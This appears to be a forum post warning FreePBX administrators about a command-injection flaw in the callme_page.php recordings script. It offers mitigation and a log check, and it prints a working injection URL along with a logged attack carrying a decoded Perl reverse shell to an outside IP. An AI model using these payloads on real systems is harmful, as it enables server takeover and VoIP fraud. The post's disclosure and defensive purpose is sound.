Hi,
Just thought I'd let you all know of a security concern with FreePBX. For those of you who make the concious decision to run FreePBX and leave the web interface with a public IP address; I'd strongly recommend you at the very least you remove the /recordings interface.
We had a customers VPS server compromised and running through some logs we noticed a very worrying issue.
It appears the /recordings/misc/callme_page.php has a very serious sanitisation error.
What does that mean for me?What it means is that someone with bad intentions can execute code as if they are the root user of the system and potentially gain access to your system.
How Do I prevent this? Ideally the answer to this question would be to refrain from using FreePBX but in practice that's not always possible. I would suggest putting at the very least the Web interface behind a firewall/ACL.
So What does the hack look like?Like so:
Code:
http://myfreepbx-ip/recordings/misc/callme_page.php?action=c&callmenum=1001@from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20fucked%20>%20/var/www/html/recordings/misc/lol%0D%0A%0D%0A
All it's going to do is create a file in your recordings folder but non the less the plausibility is there for it to be used to compromise a full system. Once in they could easily gain access to MySQL and wreck havoc.
If you're running CentOS like us i'd sudgest running the following command
Code:
cat /var/log/httpd/access_log* | grep recordings
If you start to see anything with a very long URL after the callmenum querystring parameter then it's possible your box may be compromised as well.
Quote:
[root@voip02(/)> cat /var/log/httpd/access_log* | grep recordings
213.142.137.231 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22178.63.10.87%3a53%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"
This translates to the following command being issued to asterisk:
Code:
/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"178.63.10.87:53");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Fingers crossed this will prevent at least one person from falling victim to these bastards and getting duped out of a lot of VoIP Credit.
Regards
Dean.